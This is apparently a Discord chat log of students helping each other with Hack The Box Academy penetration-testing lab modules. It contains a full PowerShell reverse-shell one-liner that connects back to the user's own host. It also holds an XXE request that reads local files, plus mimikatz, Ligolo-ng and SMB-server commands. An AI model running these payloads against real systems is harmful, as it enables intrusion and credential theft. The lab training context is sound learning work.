#modules
Got it using [grep] and filtering 'L' words @storm stratus
I know there is a typo but I thought it was weird for the flag to be HBT and not HTB
Try and run powershell as administrator
I'm just wondering if anyone has similar results
on Common Services, easy lab, some people say that they found the user just using nmap. Can someone show me a PoC?
Anyone else have issues with the academy dashboard not updating progress for the past few days? I've completed a couple module questions but neither the progress bar for the module or the percentage completed for the path has updated.
it updates for me
Hm, weird.
Make sure you're pressing the finish button on each page, partially completing a section will not update progress
That was it, thanks.
Hi, does anyone complete advanced csrf & xss skill assessment?
I have been promoted to moderator, and now I am looking for the flag API endpoint.
but unfortunately there are no signs of finding one at all...
I would appreciate it if someone could give me some hints.
Edit:
finally got the flag... It was a great module.
Hi, did anyone else face the problem with BloodHound where uploading findings from SharpHound gets stuck at 0 percent?
that happens when you use a new sharphound ingestor on an old bloodhound version. For some reason the latest bloodhound you can download is version 4.x and the latest sharphound is for bloodhound 5.x
so either upgrade your bloodhound or downgrade your sharphound
Compromise DC01 and submit the value of the flag file at C:\Users\Administrator\Desktop\flag.txt
Hello to everyone,
I am stuck on the last exercise of the ADCS skills assessment. DEV01 has been compromised and the password of jimmy's account too. But I am not able to compromise DC01.
With these new credentials I found that this user belongs to a group that "has dangerous permissions". But I am not able to execute the commands from the Linux machine.
I have read that @F4Zero has made this question before and I have searched on google for the error of "[*] Requesting certificate via RPC
[-] Failed to get dynamic TCP endpoint for CertSvc
[-] Got error: 'NoneType' object has no attribute 'request'
[-] Use -debug to print a stacktrace"
Could anyone give me a hint on how to continue?
The weird thing is that it worked for me a couple days ago, and without changing any versions of each, it just doesn't anymore
if you run sharphound one of the first lines should be something like "this version works for bloodhound x.y", check that it doesn't say 5.0 if you use the older bloodhound
I had this problem a few times
Yep, it does say that for some reason, weird. How can I upgrade to bloodhound 5.x? I downloaded it using apt after updating all the repos and it still doesn't have the right version it seems
https://github.com/SpecterOps/BloodHound has docker instructions
I ended up downgrading my sharphound so it would work with 4.x instead :X
Thanks! i'll give that a try, and in the worst case I would downgrade sharphound
Hello, am I the only one experiencing significant slowness with connections to different machines? The RDP is completely bugging, SSH as well, etc.
Has anyone online/available completed the ADCS module by chance? May I DM? Stuck on ESC11 and in the last question of the skills assessment
Can I dm you for a sec?
Message support: but have you tried using the tcp vpn pack, or changing vpn region?
sure
Working through the Nmap module. The NSE page wants me to find a flag from one of the services using NSE.
I found the HTB{} flag but it's not accepting it as the answer?
Tried removing spaces at the end?
No spaces anywhere
Don't run around the system as root
Sometimes some weird 0-width characters get copied
Dears I'm in PIVOTING, TUNNELING, AND PORT FORWARDING - RDP and SOCKS Tunneling with SocksOverRDP
I did everything I learned in this module but when I tried to get RDP on the jason machine this error occurred in Proxifier
[02.15 07:28:33] mstsc.exe (4528) *64 - 172.16.6.155:3389 error : Could not connect to proxy 127.0.0.1(127.0.0.1):1080 - connection attempt failed with error 10061
Or xfreerdp
- I found giving the password when prompted useful for some windows machines
It has been exactly 5 minutes since I've been waiting for a response, and I still haven't received any reply.
Then I'd say reread the module/sections
Restart the lab then
I've restarted the entire lab 3 times now...
This is gonna sound dumb: are you connected to the vpn?
Can't stress this enough.
Yes ..
Other question: are you by any chance running the pwnbox at the same time?
Guys you know when you RDP into a target and then you SSH from there. Paste doesn't seem to work and I just sort of accepted it. I am gonna lose my mind if I have to type out one more command by hand. There has to be a way
No, the pwnbox is turned off; I'm doing the lab on my machine.
Xfreerdp has +clipboard option
Oh my days, for real
I'm ashamed to even admit how many times I've been pulling my hair out and only after a good half hour or so do I realize I never ran openvpn
How many tun interfaces do you have? ip a
It's ok, we all make mistakes with that lol.
Just 1 tunnel, can I DM you?
No
It seems to be working for now, albeit with a lot of slowness.
I have another question: why does this command from the course not work on the box even after disabling Windows' antivirus?
I ran nc -lvnp 443 on my machine, then executed this command on the Windows VM to get a reverse shell:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<my-tun-ip>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
I get an output with only errors.
Did you replace <my-tun-ip> (I'm assuming yes)
yes
Gotta make sure, you didn't include the brackets either yeah?
no i use like this '1.1.1.1'
Does anyone want to help?
Try using a powershell one from revshells site
I tried the 3 PowerShell reverse shells available on the ||PayloadsAllTheThings|| GitHub, but none of them worked. Then I tested a reverse shell with ||Nishang||, and it worked. I don't know why the others didn't work.
I was more referring to revshells.com
Oh okay, I didn't have the information.
Hi, I'm a complete beginner when it comes to hacking or web exploitation. I was looking at the bug bounty path and was wondering what anyone's experience with it was? Were you able to get into bug bounties straight after doing the course and exam, or is it at least a very good starting point?
Would someone be so kind as to assist me here please. I've spent hours on the last flag of PTT in Linux. It's supposed to be in share \DC01\linux01 and they give you a snippet of it. Presumably to search. Without giving too much away, I've utilised the description and tried different ways of it but never get a result other than the flag that I don't need. I looked for a hint and someone said to get in the same way as the Julio flag in the same sort of location. I just don't understand how to impersonate linux01 I guess. I've got root on the linux01 machine. And about half a brain cell left.
It's the passwords module btw
If this problem statement is poor then let me know. I'm scared of spoiling it
Hi everybody! i'm stuck in the Cmd vs Powershell module, in the last question of the skill assessment! i logged in as user 10 and tried the Get-WinEvent command, but i tried all the users i got, and every time my answer is wrong!
I haven't taken the bug bounty course yet but going through the pen testing course I can say that HTB has done an excellent job teaching the material, so I would say that course plus some extra learning along with it is enough to get into bug bounties
you can impersonate that user with a keytab
Ah yes I bet I never tried that. I got lost. Thanks I'll let you know how I get on
I see thank you!
Can someone help me with burpsuite proxy problem
I found the problem! I was running the command as user10, but question asked to check in Domain Controller host!
oops
I tried implementing the command "plink -ssh -D 9050 admin@172.16.6.100" ... not sure if that worked.
https://academy.hackthebox.com/module/143/section/1278
"Submit the contents of the flag.txt file on the Administrator desktop on MS01 "
I'm sorry but I still don't get it. Is linux01 a user?
Is this the question you're stuck on?
It's the last one of the non bonus questions
I'm just gonna try a kt from the user that got me root
Finishing up this module too. If I find it I'll give you a hand
yeah,
did you find the keytab files?
I believe so, I have some hashes now and the service principal seems to be LINUX01
Hopefully I'm on the right track

I'm assuming I have to pivot and RDP into the machine, correct?
I think you just SSH from place to place
are there still connectivity issues
it's not "are there" connectivity issues, it's "how bad" are the connectivity issues
right now connectivity seems to be ok lol
yea well there were connectivity issues yesterday and I still have periodic connectivity issues with the labs
idk if anyone else is experiencing it
I had connectivity issues yesterday too using browser vm
so far so good today
alright, coulda just been a hiccup today
I always assume there's connectivity issues which is why I reword it as "how bad" are the issues lol
ah, for a particular part I'm on i have to ssh to one of the machines, and that machine would go unresponsive for like 5 minutes then let me type again
none of it on the pwn box
I don't think you have to extract the hashes from the keytab, once you acquire it, just impersonate the user with kinit
If it continues try disconnecting and reconnecting the vpn. that usually fixes it for me when using local VM
Maybe I don't have the right kt. Tried kinit. Both with and without $. I'd better try again tomorrow. Had a good 11 hours today
Thanks for your help!
This is more of a general question I've had during the AD Enumeration & Attacks module, but most of the time the modules have gotten us to RDP into hosts to locate flags, the last two questions have just left it vague and told us to retrieve the flags in a certain area. What's the most efficient way to explore the directory of a compromised Windows host/user? I used psexec.py but I was wondering what else you could use to just get a shell and explore the directories
I want to switch to this field, can someone with experience give me suggestions?
Is anyone able to provide some insight on Q3 for Web Server Pivoting with Rpivot. "Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer." I've got my pivot set up and see 2 machines . Both have port 80 open but both are default apache pages. Not sure where i'm supposed to grab the flag from.
Anyone i can dm for "AD Enumeration & Attacks - Skills Assessment Part II"
i'm stuck. i have all the users + a valid cred, but can't seem to be able to get to a shell
what do i start with?
which question you on?
after the cleartext password
Submit the contents of the C:\flag.txt file on MS01.
there isn't rdp, winrm, psexec or anything it seems like
what are you trying?
have you checked, did you double check?
always double tap with nmap
don't tell me it's on a different port
but then xfreerdp should default to the rdp port
if that is what you are talking about tho
I am on the same section just a few steps ahead
nice, i think the rest should be fair enough, i just can't get the shell so
been stuck on that for a little time
do you know how to set up a reverse shell with meterpreter on a reverse shell
just ligolo-ng
its a windows victim
ye, but that wouldn't matter.
just use a powershell shell and set up nc on your attack host
and use ligolo to route it to you
That's a T2 module if it's for the one mentioned above
Moving laterally through target networks can be confusing for newbies. Utilizing Ligolo-ng can bridge the gap.
Please keep spoilers for modules > T0 out of public chat.
there was no spoiler only a meterpreter session shot
i feel yah
just got off a plane and just wanna sleep. But my covers are in the dryer
but any help on the meterpreter shell?
i told you
why is it dying?
most likely because the connection is poor. Set up double pivoting and this issue will be no more
how do I do that?
just a single hop
ok, then it should be fine
run this command in ligolo-ng
listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
And send the reverse shell to the victim you are on, on port 11601
and set up a local nc on 11601 on your attacker machine
evil-winrm is good, if I just want to run a quick command, netexec. but usually it's whatever that's available
I don't think I've used netexec yet so I'll try to start using that more
just don't use meterpreter
and use tcp vpn if you aren't
what's the difference between netexec and psexec?
I am guessing that psexec is based on powershell and netexec uses some "net" thing?
alright
hands down best tool for AD
I never get the chance to use meterpreter so I think that I am missing out on something big, that's why I try to use it
Netexec is a suite of tools, (crackmapexec)
Ah okay that makes sense so I have used it
psexec is an impacket tool to get a shell, netexec is a swiss army knife for pretty much anything windows/AD related
are there any other documentation or videos you recommend other than the official one?
oh yeah i've heard about this. Cool
the wiki covers pretty much everything and it's all you need, htba has a cme module but it's slightly outdated
Netexec is literally cme, but better
oh ok then I will try to use it from now
That's pretty awesome cause cme is pretty great already I find
There's a whole thing with the creator and the contributing devs that resulted in the devs forking and basically making their own tool
Their Wiki is pretty in-depth too which I always appreciate, gonna try to use netexec as much as possible during the AD assessment
Hello, do you have an idea why it is not okay for this please? course: https://academy.hackthebox.com/module/158/section/1428
you need to set lhost?
still no luck, tried http-enum as well as curling the page (little support i found on the forums)
what am I supposed to input on the Skill Assessment first task of Assembly? it's been a week since I have been trying to solve this,
I tried that
I copy pasted the decoded values from the stack
it still did not work
should I copy it from bottom to top?
if you copied it from the stack then it's wrong, the xor'd value is in rdx , step through the instructions and copy after it's been xor'd
WEB ATTACKS --> skill assessment --> got the admin password reset, accessed the admin login, event calendar added, should XXE the adding of an event but i can't get flag.php
Anyone a nudge?
HTTP request:
|| POST /addEvent.php HTTP/1.1
Host: 94.237.62.195:32407
Content-Length: 214
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: /
Origin: http://94.237.62.195:32407
Referer: http://94.237.62.195:32407/event.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=icat5lf3fp9qf36sqjev41da30; uid=52
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY company SYSTEM "file:///flag.php">
]>
<root>
<name>
&company;</name>
<details>&company;</details>
<date>3303-12-31</date>
</root>
||
Can read system files but can't find flag.php
Look again in the module how you can read PHP files.
Here's a hot tip: wrapping multi-line code in ``` makes it far easier to read
lhost where???
options
Thanks! I was looking for flag.php instead of /flag.php
i swear i tried that + put HTB{ } around it and said invalid both times...
i really need help with this question:
Try to read the source code of 'upload.php' to identify the uploads directory, and use its name as the answer. (write it exactly as found in the source, without quotes)
here:
https://academy.hackthebox.com/module/136/section/1291
i don't understand how i'm supposed to get the dir for the uploads from the upload.php source
Hi guys I am stuck on
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host
I have SYSTEM on sql01, mimikatz cannot dcsync, any hints?
I have 9 mins left please
Do you guys try to memorise commands? Or whenever you are trying to exploit something, do you just look at your notes, google, etc.? Should I feel bad that I constantly need to check my notes regarding which command to use and how?
I believe not, just use them as much as you can and take notes. the more you use them the more you remember
that's what I do. but the problem is I get stuck a lot
do it the way you work best
i thought this for coding in general but after making a program with 2k lines of code i just knew it all
it's all up to knowledge and practice
if you miss 1 of them, be sure you're fucked
so it's better to be 50/50 both
my pwnbox expired now I feel sad
;[
can't u keep pressing extend for 6 hrs
i'm pretty sure there is a button for bonus time
anyone? i'm really stuck on this
yes before it was 6hrs
i tried, i don't really know what to ask tbh
now not even 4, only target can spawn for 6hrs
use VM
dump everything
i feel way more comfortable on kali than pwnbox
the lag is too much
awwww, feel bad
read the code with the type command?
today i realised that i was trying to solve a challenge that i already solved and was trying to do it for 3 straight days
You should recognize when each tool can be used, but you don't need to remember the syntax. There's also this as an interactive cheatsheet https://github.com/Orange-Cyberdefense/arsenal
yo i got a question for you since you are a pro hacker
I guess I gotta make it my motto 'when stuck dump everything'
it worked
i'm not a pro hacker i am a noob
pretty much make it a part of your standard post exploit routine
how much time did it take you?
idc about my rank i just play on the weekends
cuz i was talking with another pro hacker when asking him for help after one of the challenges shattered my system and i had to reinstall windows
run everything in a vm, simple
you seem like the guy that puts "piece of cake" on insane level machines/challenges
yeah right, u should've seen me doing the thick client applications module
thought that the hard gamepwn can't hurt me lmao
i legit couldn't boot up my pc, like i was on the repair screen
had to do PC reset
now you know
ig so
super useful, thanks!
I am stuck on the question What is the FQDN of the host where the last octet ends with "x.x.x.203"? on https://academy.hackthebox.com/module/112/section/1069. Can someone give a nudge (thanks in advance)
You have to find all Zones
I tried with different wordlists without success
and after some time of practicing in labs / boxes, some commands / syntax becomes second nature to you
for example whoami xd
henlo
henlo
subdomains of subdomains
i am still very much stuck, help (solved)
sorry if it's out of scope, out of curiosity, Is there a command for enumerating the FQDN by the IP?
you'd have to know the full ip
but anyway
the answer is gonna be in the format of subdomainB.subdomainA.inlanefreight.htb
i'd suggest starting with a zone transfer to start narrowing your search
Canonical studies
something is not working as expected
use a tool mentioned in the section
:P
ok thanks
but also zone transfer: don't rely on the wordlist until after starting with a basic zone transfer
because you can and will miss the important subdomain it's under
Hello, need some help please with the Footprinting hard assessment - I have the snmp string in the brackets but at a loss of what to do next. NMAP was completed for TCP and UDP ports. not sure what to do after running 161.
well if you have the snmp string: why not go for a walk
@soft cedar Thanks for the hint! I got there in the end.
Thank you! I should have asked a few days ago lol
np
i'm on the skills assessment of the shells and payloads section
and when i run the exploit ms17-010 on host 3 it won't create a session
are your lhost and lport right?
^
well the lhost is basically the attacker IP so 100% right
that's not right
oh
check subnets
Hi! I need help on "Windows Privilege Escalation Skills Assessment - Part I" in the question "Find the password for the ldapadmin account somewhere on the system." This is the second question but I wasn't able to solve it before escalating privileges (which was supposed to happen after getting the answer for the second question).
After becoming SYSTEM I was able to find the file with the ldapadmin password using the command "||findstr /SI /M "ldapadmin" *.xml *.ini *.txt||". My question is: how was I supposed to get the ldapadmin password before escalating privileges to SYSTEM?
ello
hello everyone
I just started, created acc and want to start learning, would you suggest me go into academy section or hacker section?
I saw both have different pricing, that's why I'm asking
if starting point from the hacker section is too hard try the academy. it depends where you're at on computers already prior to trying either.
both have free options, i'd say dip your toes in starting point (labs) and getting started path (academy) and see which one you like best
if you're absolute starter i suggest the academy so u can develop a methodology and communicate using terms that everyone knows.
I'm a beginner in hacking and security things, so probably academy should be better
yeah it's good.
are you also using in academy virtual machines for teaching?
Because I saw for myself that when I'm learning something using virtual machines it helps me more because I see with my own eyes how it works etc, if you understand me
what's the best way to upload files from windows using powershell? I normally use rdp, smb, etc but those are not available now. I tried to use uploadserver and I get a 400 error: Invoke-WebRequest -Uri http://172.16.7.240:5555/upload -Method POST -InFile C:\Users\Public\sam.save
Yeah I know but for me it's better to ask here how it's all about
they have a browser computer you can use called the pwnbox, that's a vm u don't have to configure or maintain
you can use impacket-smbserver ?
rdp with /drive:x,.
then u can use the unc path like, //tsclient/x
use powershell to base64 encode the file then copy and paste it then
sam files are long
it's so easy tho
if we are talking about academy billing, which one you suggest? not sure if "+200" cubes per month is enough or nope
There are several Tier0 modules in the academy that you can try out for free
not with the rdp lag
what are your ambitions?
bro how do you navigate in that rdp panel in the shells and payloads skills assessment? :(
its a nightmare to copy
Winter do everything for free b4 u spend a dime. See if the content is right for you. Starting point is free and there's tier 0 modules that r free too
for now? learn the basics, how it works and understand what I need to understand, daily practising and putting a few hours per day into it.
if you qualify as a student then do the student subscription. Otherwise try a few modules with the free cubes. For non-students that want to complete a full path the platinum subscription is the most bang for your buck
a worse quality version of the academy that's free exists on tryhackme.com but it's worse by farrrr
it's free though, just leaves a lot to be desired and you'll find yourself googling a lot
http works, you need the psupload script, google
ok
php upload??
yeah do the academy if u got a few hours to spare. idk if u kno but there are certs u can get at the end to validate your skills. are you interested in also getting certified ?
Yeah for sure I will, but I want to know it before, to know how much I should prepare to lose for it (if I will)
Probably not
found it
if you don't want the cert just try the modules a la carte
that's what i do
a la carte?
yeah just pick what you like or wanna do/learn about
i'm doing all the modules tho :x
can I find it somewhere how I use them?
I will probably too
you use those to unlock modules
yeah the cubes unlock them and the subscription model gets you cubes. normally a la carte is 100 cubes for $10
tier 0 are free, ie you get the 10 cubes back after you've completed them
winter, do all the tier 0 ones, see if u like the style b4 u buy it
oh I see
I now understand what you are talking about
Okay, thank you for now
don't buy cubes a la carte lol, it's a big waste of money compared to the monthly subs
do you mean teaching or learning: two different verbs
learning, mistake
you can use the in-browser virtual machine for all academy content (in fact all academy content is verifiably doable with it)
and are you paying right now for something?
it's preferred for most people to set up their own (and there is a setting up module)
how do i navigate to website in rdp in shells and payloads live engagement?
i can't find any browser
firefox
:)
I have plat monthly because I'm doing tier 3 & 4, but if you're a student get that, amazing value to unlock everything tier 2 and below for $8 a month
yeah use an edu email
also pay attention to the desktop
what's your favorite t3/4 module after the cpts path so far? I got 1.1k cubes left and don't know if I want to spend them on 2x game hacking or more AD stuff
once i land a new job i'm thinking about swapping
kerberos attacks, ADCS, the cme module is also very good. I also like the assembly module
did assembly already, that one was fun.
i have the game hacking one
PASSWORD ATTACKS >>> Protected Archives >>> Use the cracked password of the user Kira, log in to the host, and read the Notes.zip file containing the flag. Then, submit the flag as the answer.
In the above question, I'm able to locate the Notes.zip file and copy it to my attack machine, then get the hash, and finally use john to crack the hash using the mutated password list given in the module. But the cracked hash I'm getting seems to not be accepted as the answer in that specific section. Can someone assist?
Thanks for the tip
it works like butter
yeah depends on your interests mostly, I've done all the AD related modules and most of them are great
are there legit people that look at hard machines and are like damn, that's so easy? like how to know if i can make it into cybersecurity
I am trying to transfer my mimikatz.exe file from my linux attack machine to the windows machine that I reverse shelled into and I am not sure how to use the smb share transfer method
sudo impacket-smbserver share -smb2support /tmp/smbshare
did you do bloodhound and powerview too? They seem a bit short for 1k cubes
sorry i just can't find firefox on the desktop or in the menu, idk maybe i'm just tired
it doesn't have a shortcut, you just gotta open the terminal and type "firefox"
bloodhound is 500, it's alright but not as strong as other tier 3 modules. powerview is the only AD module I didn't do. the ldap module is not good so I probably won't unlock powerview unless they update it
the Notes.zip contains a file that has the answer
ah yea was thinking of ldap then
HTB{..}
thanks man
the desktop comment was for the access_creds.txt
MANY people looked over it (myself included)
i did powerview. it's pretty good. i didnt think ldap was too bad either.
i use gc for cubes so
gc?
gift cards.
0 / 1 spawns left
I am saving for one can you please recommend one I was thinking of getting kerberos attacks
I am at 300 cubes
buy a subscription or get a vm
i don't have any of the newly released ones done yet, i'm still catching up on the soc one then i'll do them.
maybe I will hop into the "Silver" just as a try for this month
the soc one is new to me and cpts too. i did just cbbh when it came out.
easier to get a vm tbh
you can set up your own vm for free if your pc is good enough
isn't it better to have it from them?
it's better to learn how to use one on your own
are you using your own vm or theirs?
is there some + or -? instead of paying
?
i use the browser one it's good if u dont want to use your own and already know how to set it up
not sure I quite understand what you're asking
extending lifetime of vm
if you use your own vm you don't have to worry about lifetimes
instance
i mean yeah; but you don't need a sub for that
and If something is "Silver" enough?
Silver monthly?
yes
it just depends on the pace you're going
also the information Security Fundamentals path is decent for beginners
No, but keep an eye on our social channels. We do giveaways now and again.
bruh, it's a waste of time
Yes, I used zip2john to crack the zip file
and then got separate hash file to crack the hash
you cracked the password for the zip file
Can someone help me in the Nessus Skills Assessment?
I know it sounds easy, but the Nessus scan result doesn't show the accessible SMB shares.
I'm stumped I need help
did you unzip the Notes.zip file after getting the password?
kerberos and adcs
I wouldn't recommend it
I guess kerberos is covered in ad enum and attack so I will go for adcs
uh anyone?
If not ill just resort to google
Oh yea I meant I mixed up bloodhound and LDAP, not that I was considering spending 1k on LDAP yet. I'll probably follow your recommendation and do adcs and Kerberos
Going through zephyr rn and having a good time, and maybe I'll get stuck and can gain new knowledge
kerberos covers a lot more than ad enum and attack, don't get adcs if you aren't already familiar with kerberos
are you looking at the right results?
:P it sounds dumb
I helped a few people with adcs when they hadn't done kerberos attacks and it's painful to say the least
oh then kerberos it is do you have any other tier 3 module in mind to do before cuz I guess I will get only one unlock for free
but the Nessus pre-populated results should have everything and the preceding sections regarding using Nessus should be enough
this one, right?
I then tried to copy my mimikatz.exe onto my target machine with no luck using this command:
copy \10.10.15.235\usr\share\mimikatz\Win32\mimikatz.exe C:\
i forget if it's the authed or unauthed one
The crackmapexec module content looked juicy, it was really nice working with netexec in zephyr so far
Any advice on where i'm going wrong here? it's showing a write error but i'm not attempting to write anywhere, just open a CMD
you need to do \\ip\share\file for smb
in order of most recommended imo: kerberos, adcs, relay, cme, dacl
it's been a minute since i've done it but the sections detailing how to use nessus should be enough to figure it out
Yes I unzipped
the relay module is also very good @tranquil axle
okay then
Mmm relay
but also: are you running an smbshare on your root filesystem?
Maybe I'll just sub for some more cubes and just do all 5 lol
where do you have the share running?
it's great but slightly outdated
Time to stack up on CPTS2 modules
Here... following instructions from my file transfer method module
sudo impacket-smbserver share -smb2support /tmp/smbshare
Bruh I found it but it was marked as INFO and not Low or Medium so it went right over my head, thank you for.. uh.. yeah
ok then you're fundamentally misunderstanding how smb works
the sharename is "share" given by the command, and the location you actually shared is "/tmp/smbshare"
which has 0 links to the current directory/file you're attempting to share
(unless you symlink it)
So when I type 'smbmap -H 10.129.105.110' and it doesn't return any shares...does that mean the share isn't on my target machine?
...
look where you're running the share
it's in the pwnbox
how would you creating a share on the pwnbox, create one on the target?
the share running on YOUR system is mapped to the /tmp/smbshare directory on your system
Hey guys, i'm doing the WINDOWS PRIVILEGE ESCALATION section SeTakeOwnershipPrivilege. I want to know if i'm supposed to find a user that has SeTakeOwnershipPrivilege or if the user hackthebox provided to rdp as would have SeTakeOwnershipPrivilege, as the user they provided does not have SeTakeOwnershipPrivilege
run as admin
Hey, I'm doing the Windows Event Logging basics and I'm stuck: "Build an XML query to determine if the previously mentioned executable modified the auditing settings of C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\wpfgfx_v0400.dll. Enter the time of the identified event in the format HH:MM:SS as your answer."
I decided to hop into the silver subscription, since I'm using 2 devices and changing between them, saving time by doing the VM 2 times
thank you sir
whatever works for you
And also I'm changing my OS systems pretty much
¯\_(ツ)_/¯
going through the pivoting course, I'm curious: is there a reason you would need to use tools like chisel instead of just using ligolo-ng? or is it just personal preference. I noticed neither HTB academy / offsec / TCM talk about the use of ligolo but it's so easy
ligolo-ng is pretty new and you are learning some of the old methods
You should know how and why they work
are there instances where they would work and ligolo would not?
Chisel for example can be used to expose the port of an internal server to you, not sure how you'd do that with ligolo
not until the most recent update couple of weeks ago
also ligolo can't forward smb traffic, and ssh pivoting is simpler in the sense you don't have to drop a binary onto the host
are you talking about like basic port forwarding / sshuttle?
yes, there are times where you need to access a port that's only open on localhost, for example
awesome thanks, just trying to gauge how deeply I need to understand the tools
it's also good to learn how the tools work behind the scenes before moving to something that does it automatically
Ligolo is my goto, too, but sometimes you may need some of the others. And yes, it's important to try and understand why
right , the 'tmp/smbshare' isn't on the pwn box ...the share would need to be on the target I think.
I was ignoring the previous command I used after I realized that the /tmp/share didn't exist; that's why I ran the smbmap command to see where the share on my target machine would possibly be located.
just host the smbshare in the directory you have the file you're trying to transfer
replace /tmp/smbshare with /usr/share/mimikatz/Win32
syntax being smbserver {sharename} {options} {filepath_on_system}
sirs, can somebody help me please? when I try to boot my .ovpn archive on kali the terminal breaks at this point of running:
2024-02-15 21:27:47 Timers: ping 10, ping-restart 120
2024-02-15 21:27:47 Protocol options: explicit-exit-notify 1
it's not broken, openvpn needs to be running for the connection, just open another terminal
is it just open another terminal and run the command again?
no, you're already connected, leave the openvpn instance in the background and do other things
sudo openvpn *.ovpn &
put the &
tks mr.s
but I'm having another problem starting the service, following the same:
"Error!
You must stop your active machine before spawning another one."
this error happens when I click on the button "Spawn Machine". Can you help me please?
I saw the message and I don't have 2 machines booted at the same time for now
What's your HTB username?
goblin with the instant tech support 
Please try again @graceful forge
ok @ocean night
btw read #welcome to get verified so you can see more of the server
i got it guys
Great
tks @next bronze and @ocean night
ok tks man
You're welcome
tbh if you scroll up just a little bit from that, you'd see that the Initialization Sequence Completed
meaning it's running
yeaaah @fathom pendant, i saw this, but tks for the message!
I prefer not to daemonise (putting & at the end) so I can quick kill the VPN if I need to switch due to performance issues
Hey y'all, I cannot find the password for the support users on Broken Authentication. Do the users change every reset? My password list is 50 total lines long. I read the write up to the part I'm on and I seem to be doing things correctly. Any advice?
is your fail string correct?
or are you sure you've got the right thing
also there shouldn't be a writeup for this module as it's tier 2
only tier 0 modules are allowed writeups
Failure String is "Invalid credentials" and timeout is "Too many login failures"
by writeup do you mean the section content?
Nah fam some medium article
send link?
Ill DM you
you realize that I'm reporting the link for it breaking ToS yeah?
ToS?
yes: writeups are disallowed and break ToS for academy content
any writeup for content above tier 0 is explicitly not allowed lol
especially for skill assessments, which should be testing your knowledge regarding the content you've read up until that point
:P
Nice
Awe nah
So I'm on question 7 of AD Skills Assessment 2 and have an sql shell, but I'm not sure where to go from here. None of the cmd reverse shells are working with my netcat listener. Here is the output of the whoami /priv
My b'
what can you do with those privileges
Thanks @fathom pendant - identified and banned.
Not sure, that's what I'm wondering. I was trying to go for a one-liner reverse shell.
not sure? check your notes
what section
Yo did I just get banned?
Are you the author of that spoiler?
Nope
Then no
Oh well thats a relief
I could only find powershell on revshells.org, none of them worked.
I'm asking what can you do with those privileges
and did you set up the pivots correctly
I'm just using mssqlclient.py with the previous question's credentials I found.
np the article isn't even well written tbh either
no wonder trying to follow it led nowhere for them :/
The "Moving On" section of the module doesn't give much to move on with, haha.
why not see if you can just read the desktop directly
It's not really much
also the mssql section of attacking common services really went over impersonation
Not there
Someone in the forum mentioned a printspoofer? I can't find that in the common services section.
So confused!!!
Taking a break, if anyone has some insight please DM me in the meantime.
printspoofer might be a method that allows a shell
¯\_(ツ)_/¯
I'm not familiar with printspoofer, I'll have to check the section again. Not in my notes
it's not in common services but it is a common vulnerability
¯\_(ツ)_/¯
printspoofer is mentioned in the module
they're talking about the AD module
yes
i'm just referring to something they said earlier regarding impersonation with the Common Services module comment
Can someone give me a hint on AD Skills Assessment 1, I feel like I'm missing something really basic but I'm starting to get frustrated. I don't know how much I can say but I'm still stuck on the first machine, got a rev shell, found the SPN mentioned in the second question but I don't know how to retrieve the ticket without any tools. I uploaded Mimikatz to the machine but I can't run it from this rev shell so I'm stuck
upload tools that can help you kerberoast
That's why I uploaded Mimikatz so I can extract the ticket from memory, but unable to run it from the rev shell apparently since I'm getting no output
mimikatz doesn't kerberoast
Broken Auth Skills Assessment
No not directly, but it can be used to extract the ticket from memory. thought it would be simpler than compiling and uploading the more automated tool. But I'll give it a shot, I just don't know why that would run when mimikatz won't right now
extracting tickets from memory is different from kerberoasting, you still need to request the ticket first
Lol there are newline characters in my password
Yeah sorry should have clarified enumerated SPNs with setspn.exe and then used System.IdentityModel.Tokens.KerberosRequestorSecurityToken, hence why I was moving on to Mimikatz
Finally tackling the password labs HERE WE GO
Yup the other tool worked. Is there a reason mimikatz wasn't working, would like to know how to avoid wasting time in the future and just go straight to compiling the other tool
are you running it in the webshell?
usually mimikatz spawns another window
if you're trying to do some command shenanigans
No I hated the webshell so I used base64 encoded powershell rev shell I found on revshells, was trying to run it from there
ah okay that would make some sense
mimikatz isn't too friendly on non-ui shells
it doesn't
Got it, I'll make a note of that in the future
that's only if you pth or something, it's always inline on start
it's still not an interactive shell, you need to run mimikatz in non interactive mode, something like
.\mimikatz.exe "privilege::debug" "token::elevate" "<command here>" "exit"
Ah okay I'm gonna write this down thanks I appreciate it
Hello, I have a question about lateral movement.
In a pentest, the pentester accessed host-c from host-a based on credentials collected from host-b , is that a lateral movement from host-a to host-c or from host-b to host-c?
why do I have to use git clone to download a .exe for PrintSpoofer?! I downloaded the zip and there was no exe. Now I used git clone based on a writeup using the tool and git clone spits out a file with an exe. I don't get it.
Oh, nevermind, they're in releases
I don't understand why the PrintSpoofer was the key to the SQL01 machine, how was I supposed to know that without getting a hint online?!
just fucking around and finding out ¯\_(ツ)_/¯
It's discouraging, would have taken me forever to figure that out
likely something in the enumeration phase would have revealed it
bro it says it right there, seimpersonate
It's not the end of the world, but I'm worried about the exam
There's no writeup or discord on the exam. I'm just hoping that it's not as specific because I feel like I could be searching for days for some small detail.
my brother in christ
It's likely talked about in the module that SeImpersonate = try printspoofer
does juicypotato also work?
I went back and finally found something mentioning printspoofer, but it was among two other tools
yes
probably mentioned in context to privileges
Stuck on
WINDOWS PRIVILEGE ESCALATION : Credential Hunting
Question:
Search the file system for a file containing a password. Submit the password as your answer.
Tried this [2] as per Hint, but nothing..!
Can anyone give a nudge..
i mean the password might not be "Password"
then learn how to use
it cannot be more obvious
not even 'password' ???
it just says containing A password
doesn't mean that it contains the text "password"
